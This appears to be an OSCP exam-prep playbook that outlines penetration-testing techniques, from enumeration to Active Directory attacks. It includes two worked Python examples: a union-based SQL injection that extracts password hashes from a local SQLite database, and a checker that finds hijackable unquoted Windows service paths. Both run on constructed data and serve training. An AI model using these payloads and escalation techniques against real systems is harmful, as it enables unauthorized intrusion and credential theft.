2. OSCP PLAYBOOK
1. Host Enumeration
1.1. Passive Enumeration
- Whois
- Netcraft
- Whatweb
- GitHub Leakage
  - gitrob
  - gitleaks
- Security Headers & TLS Configuration
  - securityheaders.com
  - ssllabs.com/ssltest
- Shodan
1.2. Active Enumeration
- DNS Enumeration
  - host
  - dnsrecon
  - dnsenum
  - nslookup (WIN)
- Port Scanning
  - nmap
  - Test-NetConnection (WIN)
  - nc
- SMB Enumeration
  - nbtscan
  - smbmap
  - net view (WIN)
  - CrackMapExec
- SMTP Enumeration
  - nc
  - Telnet client (WIN)
- SNMP Enumeration
  - onesixtyone
  - snmpwalk
2. Vulnerability Scanning
3. Web
3.1. Web Application Enumeration
- Banner Grabbing
  - nmap
  - nc
- Directory Busting
  - gobuster
  - dirb
  - dirsearch
- Source Code & Requests
  - burp
  - curl
- Infrastructure
- Response-headers
- Sitemaps
- API Fuzzing
- WordPress Enumeration
  - wpscan
  - dirsearch
- Netcraft
- Whatweb
3.2. Web Application Attacks
- Cross-Site Scripting (XSS)
  - Stored XSS
  - Reflected XSS
  - DOM-based XSS
- Directory Traversal
- Local File Inclusion (LFI)
- Remote File Inclusion (RFI)
- PHP Wrappers
- File Upload
- OS Command Injection
- SQL Injection (SQLi)
  - Error-based SQLi
  - Union-based SQLi
  - Blind SQLi
  - sqlmap
- WordPress Reverse Shell
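Union-based SQLi from the list above, as an added worked example (not code from the playbook). It runs against an in-memory SQLite database; the schema, rows and the stored hash string are constructed for illustration. It shows the three steps a practitioner actually performs: probe the column count with ORDER BY, build a UNION of matching width that comments out the trailing quote, and compare the vulnerable string-built query with the parameterized one.

```python
"""Union-based SQL injection against an in-memory SQLite database.

Added example, not from the playbook. The schema, rows, and payloads are
constructed for illustration; the stored hash is a placeholder string.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: the table the app queries and the one to steal."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE products (id INTEGER, name TEXT, price REAL);
        INSERT INTO products VALUES (1, 'widget', 9.99), (2, 'gadget', 19.99);
        CREATE TABLE users (id INTEGER, username TEXT, password_hash TEXT);
        INSERT INTO users VALUES (1, 'admin', 'sample-hash-value');
        """
    )
    return conn


def search_vulnerable(conn, term: str):
    """Vulnerable: the search term is concatenated into the SQL text."""
    sql = f"SELECT name, price FROM products WHERE name = '{term}'"
    return conn.execute(sql).fetchall()


def search_safe(conn, term: str):
    """Hardened: same query with a bound parameter, so input is data, never SQL."""
    return conn.execute(
        "SELECT name, price FROM products WHERE name = ?", (term,)
    ).fetchall()


def find_column_count(conn, max_cols: int = 10) -> int:
    """Probe the SELECT's column count with ORDER BY n: the first n that errors
    is one past the real count (the UNION must have matching width)."""
    for n in range(1, max_cols + 1):
        try:
            search_vulnerable(conn, f"x' ORDER BY {n} -- ")
        except sqlite3.OperationalError:
            return n - 1
    raise RuntimeError("column count not found")


def union_payload(column_count: int) -> str:
    """Build a UNION SELECT of the right width pulling from users; the
    trailing '-- ' comments out the quote the application appends."""
    cols = ["username", "password_hash"] + ["NULL"] * (column_count - 2)
    return "x' UNION SELECT " + ", ".join(cols[:column_count]) + " FROM users -- "


if __name__ == "__main__":
    db = make_db()
    n = find_column_count(db)
    payload = union_payload(n)
    print("columns:", n)
    print("vulnerable:", search_vulnerable(db, payload))
    print("parameterized:", search_safe(db, payload))
```

The parameterized version returns no rows for the payload because the whole string is matched as a product name; the vulnerable version returns the users row.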
4. Client-side
4.1. Target Reconnaissance
4.2. Client-side Attacks
- Macros
- Windows Library Files (.Library-ms)
- Phishing
5. Exploits
- Exploit-DB/searchsploit
- Packet Storm
- GitHub
- Metasploit
- NSE Scripts
- Cross-compiling
6. Anti-virus Evasion
6.1. Evasion Testing
- AntiScan.Me
- VirusTotal
6.2. Evasion TTPs
7. Password Attacks
7.1. Remote Password Attacks
7.2. Hash-stealing
- Mimikatz
- Pass-the-hash
- NTLMv2 Stealing
- NTLMv2 Relaying
7.3. Hash-cracking
- Hash Enumeration
- Hash Conversion
- Hash Cracking
8. Windows Privilege Escalation
8.1. Enumeration
8.2. Privilege Escalation
- SeImpersonatePrivilege abuse via named pipes (check with whoami /priv)
  - PrintSpoofer
- Dumping SAM
- Writable Files & Directories
- Service Binary Hijacking
- Unquoted Service Paths
- Scheduled Tasks
- DLL Hijacking
- UAC Bypass
- NTLMv2 Stealing
- NTLMv2 Relaying
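The unquoted service path check from 8.2, as an added example (not code from the playbook). Given ImagePath values such as those reported by sc qc or wmic service get name,pathname, it flags unquoted paths containing spaces and lists, in the documented CreateProcess search order, the directories where a planted binary would be executed before the real one. SAMPLE_SERVICES is constructed input; whether those directories are actually writable still has to be checked on the host (icacls), which this offline code does not do.

```python
"""Unquoted service path check: which paths Windows tries before the real binary.

Added example, not from the playbook. SAMPLE_SERVICES is constructed to look
like ImagePath values from 'sc qc' / 'wmic service get name,pathname'.
"""
import ntpath
import re

# Constructed sample: one properly quoted path, one unquoted path with spaces,
# one unquoted path without spaces (not exploitable).
SAMPLE_SERVICES = {
    "GoodSvc": '"C:\\Program Files\\Good Vendor\\svc.exe" -run',
    "BadSvc": "C:\\Program Files\\Bad Vendor\\Sub Dir\\service.exe -k arg",
    "SysSvc": "C:\\Windows\\System32\\svchost.exe -k netsvcs",
}


def executable_part(image_path: str):
    """Return the executable path when the ImagePath is unquoted, else None.
    The executable is everything up to the first '.exe' followed by
    whitespace or end of string, so service arguments are excluded."""
    p = image_path.strip()
    if p.startswith('"'):
        return None
    m = re.match(r"(.+?\.exe)(?:\s|$)", p, re.IGNORECASE)
    return m.group(1) if m else p.split(" ")[0]


def search_candidates(exe_path: str):
    """Paths tried in order for an unquoted path with spaces: the string cut
    at each space with '.exe' appended, then the real executable last."""
    cands = [exe_path[:i] + ".exe" for i, ch in enumerate(exe_path) if ch == " "]
    return cands + [exe_path]


def find_unquoted(services: dict):
    """Map each exploitable service to the directories where an attacker-
    planted binary would be picked up before the real one. Writability of
    those directories must still be checked on the host (icacls)."""
    findings = {}
    for name, image_path in services.items():
        exe = executable_part(image_path)
        if exe and " " in exe:
            plant_dirs = [ntpath.dirname(c) for c in search_candidates(exe)[:-1]]
            findings[name] = plant_dirs
    return findings


if __name__ == "__main__":
    for svc, dirs in find_unquoted(SAMPLE_SERVICES).items():
        print(svc, "->", dirs)
```

The fix on the defender's side is to quote the ImagePath; on the attacker's side the interesting directories are the ones a low-privileged user can write to, typically a vendor directory under C:\Program Files with loose ACLs rather than C:\ itself.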
9. Linux Privilege Escalation
9.1. Enumeration
9.2. Privilege Escalation
- sudo -l (sudo rules)
- SUID Binaries
- Capabilities
- Writable Files & Directories
- Cronjobs
- Kernel & Local Exploits
  - PwnKit (CVE-2021-4034)
  - Dirty Pipe (CVE-2022-0847)
  - Baron Samedit (CVE-2021-3156)
10. Port Tunneling & Pivoting
10.1. Linux Pivoting
- Socat
- Proxychains (SOCKS)
- Ligolo-ng
- SSH Port Forwarding
10.2. Windows Pivoting
10.3. Other Tunnels
11. Metasploit Framework
- Setup
- Meterpreter
- MSFVenom
- Automated Resource Scripts
- Post Exploitation
12. Active Directory
12.1. Enumeration
12.2. Manipulation & Escalation
- Kerberoasting
- AS-REP Roasting
- SPNs + Silver Tickets
- Object Permissions (GenericAll)
- LSASS Credential Dumping
- Domain Shares
- DCSync
- DCOM
- NTLMv2 Stealing
- NTLMv2 Relaying